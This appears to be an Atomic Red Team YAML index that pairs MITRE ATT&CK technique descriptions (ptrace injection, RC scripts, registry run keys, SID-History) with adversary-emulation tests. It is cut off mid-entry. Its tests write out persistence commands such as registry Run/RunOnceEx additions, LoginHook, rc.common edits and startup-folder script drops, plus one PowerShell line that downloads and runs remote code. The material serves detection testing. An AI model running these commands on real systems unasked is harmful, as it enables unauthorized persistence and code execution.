source_name: PTRACE man + url: http://man7.org/linux/man-pages/man2/ptrace.2.html + description: Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's + Manual. Retrieved February 21, 2020. + - source_name: Medium Ptrace JUL 2018 + url: https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be + description: Jain, S. (2018, July 25). Code injection in running process using + ptrace. Retrieved February 21, 2020. + - source_name: BH Linux Inject + url: https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf + description: Colgan, T. (2015, August 15). Linux-Inject. Retrieved February + 21, 2020. + - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: + Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved + December 20, 2017.' + source_name: ArtOfMemoryForensics + - url: https://www.gnu.org/software/acct/ + description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved + December 20, 2017. + source_name: GNU Acct + - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing + description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - + Chapter 7 - System Auditing. Retrieved December 20, 2017. + source_name: RHEL auditd + - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html + description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. + Retrieved December 20, 2017. + source_name: Chokepoint preload rootkits + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Ptrace System Calls + description: "Adversaries may inject malicious code into processes via ptrace + (process trace) system calls in order to evade process-based defenses as well + as possibly elevate privileges. 
Ptrace system call injection is a method of + executing arbitrary code in the address space of a separate live process. + \n\nPtrace system call injection involves attaching to and modifying a running + process. The ptrace system call enables a debugging process to observe and + control another process (and each individual thread), including changing memory + and register values.(Citation: PTRACE man) Ptrace system call injection is + commonly performed by writing arbitrary code into a running process (ex: malloc) + then invoking that memory with PTRACE_SETREGS to set the register + containing the next instruction to execute. Ptrace system call injection can + also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, + which copy data to a specific address in the target processes’ memory (ex: + the current address of the next instruction). (Citation: PTRACE man)(Citation: + Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible + targeting processes with high-privileges, and on some system those that are + non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context + of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via ptrace system call + injection may also evade detection from security products since the execution + is masked under a legitimate process. 
" + id: attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-06-20T22:24:56.734Z' + created: '2020-01-14T01:33:19.065Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system + call should not generate large amounts of data due to their specialized nature, + and can be a very effective method to detect some of the common process injection + methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: + RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process + behavior to determine if a process is performing actions it usually does not, + such as opening network connections, reading files, or other suspicious actions + that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + atomic_tests: [] + T1037.004: + technique: + id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 + description: |- + Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. + + Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. 
+ + Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + + Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) + name: RC Scripts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.004 + url: https://attack.mitre.org/techniques/T1037/004 + - source_name: IranThreats Kittens Dec 2017 + url: https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/ + description: Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, + A Case of Ambiguity and Shared Code. Retrieved May 28, 2020. + - description: Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted + Linux Systems. Retrieved June 24, 2019. + url: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/ + source_name: Intezer HiddenWasp Map 2019 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' 
+ - source_name: Apple Developer Doco Archive Launchd + url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (2016, September 13). Daemons and Services Programming + Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021. + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - source_name: Ubuntu Manpage systemd rc + url: http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html + description: Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility + generator for starting /etc/rc.local and /usr/sbin/halt.local during + boot and shutdown. Retrieved February 23, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:01.927Z' + created: '2020-01-15T16:25:22.260Z' + x_mitre_platforms: + - macOS + - Linux + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: "Monitor for unexpected changes to RC scripts in the /etc/ + directory. Monitor process execution resulting from RC scripts for unusual + or unknown applications or behavior.\n\nMonitor for /etc/rc.local + file creation. Although types of RC scripts vary for each Unix-like distribution, + several execute /etc/rc.local if present. 
" + x_mitre_permissions_required: + - root + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1037.004 + atomic_tests: + - name: rc.common + auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de + description: | + Modify rc.common + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + supported_platforms: + - macos + executor: + command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello + World"'' >> /etc/rc.common + +' + elevation_required: true + name: bash + T1547.007: + technique: + created: '2020-01-24T18:15:06.641Z' + modified: '2020-01-24T19:51:37.795Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e + description: "Adversaries may modify plist files to automatically run an application + when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain + applications to be re-opened when a user logs into their machine after reboot. + While this is usually done via a Graphical User Interface (GUI) on an app-by-app + basis, there are property list files (plist) that contain this information + as well located at ~/Library/Preferences/com.apple.loginwindow.plist + and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. + \n\nAn adversary can modify one of these files directly to include a link + to their malicious executable to provide a persistence mechanism each time + the user reboots their machine (Citation: Methods of Mac Malware Persistence)." 
+ name: Re-opened Applications + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.007 + url: https://attack.mitre.org/techniques/T1547/007 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Modification' + - 'Command: Command Execution' + x_mitre_detection: Monitoring the specific plist files associated with reopening + applications can indicate when an application has registered itself to be + reopened. + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.007 + atomic_tests: + - name: Re-Opened Applications + auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba + description: | + Plist Method + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + executor: + steps: | + 1. 
create a custom plist: + + ~/Library/Preferences/com.apple.loginwindow.plist + + or + + ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist + name: manual + - name: Re-Opened Applications + auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + description: | + Mac Defaults + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + input_arguments: + script: + description: path to script + type: path + default: "/path/to/script" + executor: + command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} + +' + cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook + +' + elevation_required: true + name: sh + T1547.001: + technique: + id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 + description: |- + Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. 
+ + The following run keys are created by default on Windows systems: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce + + Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) + + The following Registry keys can be used to set startup folder items for persistence: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + + The following Registry keys can control automatic startup of services during boot: + + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices + + Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + + * 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + + The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. + + Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. + + By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. + + Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + name: Registry Run Keys / Startup Folder + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.001 + url: https://attack.mitre.org/techniques/T1547/001 + - external_id: CAPEC-270 + source_name: capec + url: https://capec.mitre.org/data/definitions/270.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. 
(n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - source_name: Microsoft Wow6432Node 2018 + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry + description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data + in the Registry. Retrieved August 3, 2020. + - source_name: Malwarebytes Wow6432Node 2016 + url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ + description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved + August 3, 2020. + - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key + description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry + Key. Retrieved June 29, 2018. + source_name: Microsoft RunOnceEx APR 2018 + - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ + description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden + from Autoruns.exe. Retrieved June 29, 2018. + source_name: Oddvar Moe RunOnceEx Mar 2018 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-06T18:36:29.226Z' + created: '2020-01-23T22:02:48.566Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_detection: |- + Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. + + Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.001 + atomic_tests: + - name: Reg Key Run + auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 + description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will + modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output + will be via stdout. 
\n" + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.exe + executor: + command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V + "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" + +' + cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + /V "Atomic Red Team" /f >nul 2>&1 + +' + name: command_prompt + - name: Reg Key RunOnce + auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb + description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe + will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will + be via stdout. \n" + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /d "#{thing_to_execute}" + +' + cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: PowerShell Registry RunOnce + auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 + description: | + RunOnce Key Persistence via PowerShell + Upon successful execution, a new entry will be added to the runonce item in the registry. 
+ supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: powershell.exe + reg_key_path: + description: Path to registry key to update + type: Path + default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce + executor: + command: | + $RunOnceKey = "#{reg_key_path}" + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" + -Force -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Suspicious vbs file run from startup Folder + auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + description: "vbs files can be placed in and ran from the startup folder to + maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will + be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious jse file run from startup Folder + auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 + description: "jse files can be placed in and ran from the startup folder to + maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will + be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious bat file run from startup Folder + auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e + description: | + bat files can be placed in and executed from the startup folder to maintain persistance. + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + folder and will also run when the computer is restarted and the user logs in. 
+ supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + description: 'Adds a non-malicious executable shortcut link to the current users + startup directory. Test can be verified by going to the users startup directory + and checking if the shortcut link exists. ' + supported_platforms: + - windows + executor: + command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation + = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell + = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath + = $Target\n$Create.Save() " + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start + Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1134.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.005 + url: https://attack.mitre.org/techniques/T1134/005 + - url: https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx + description: Microsoft. (n.d.). Security Identifiers. 
Retrieved November 30, + 2017. + source_name: Microsoft SID + - url: https://msdn.microsoft.com/library/ms679833.aspx + description: Microsoft. (n.d.). Active Directory Schema - SID-History attribute. + Retrieved November 30, 2017. + source_name: Microsoft SID-History Attribute + - url: https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems + description: Microsoft. (2017, June 23). Well-known security identifiers in + Windows operating systems. Retrieved November 30, 2017. + source_name: Microsoft Well Known SIDs Jun 2017 + - url: https://technet.microsoft.com/library/ee617241.aspx + description: Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved + November 30, 2017. + source_name: Microsoft Get-ADUser + - url: https://adsecurity.org/?p=1772 + description: 'Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence + #14: SID History. Retrieved November 30, 2017.' + source_name: AdSecurity SID History Sept 2015 + - url: https://msdn.microsoft.com/library/ms677982.aspx + description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November + 30, 2017. + source_name: Microsoft DsAddSidHistory + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SID-History Injection + description: |- + Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). 
+ + With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006). + id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:49:58.414Z' + created: '2020-02-18T18:34:49.414Z' + x_mitre_contributors: + - Alain Homewood, Insomnia Security + - Vincent Le Toux + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory) + + Monitor for Windows API calls to the DsAddSidHistory function. 
(Citation: Microsoft DsAddSidHistory) + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1053.005: + technique: + created: '2019-11-27T14:58:00.429Z' + modified: '2020-12-30T14:26:44.730Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1053.005 + url: https://attack.mitre.org/techniques/T1053/005 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. + source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task + description: |- + Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. + + The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. + + An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of 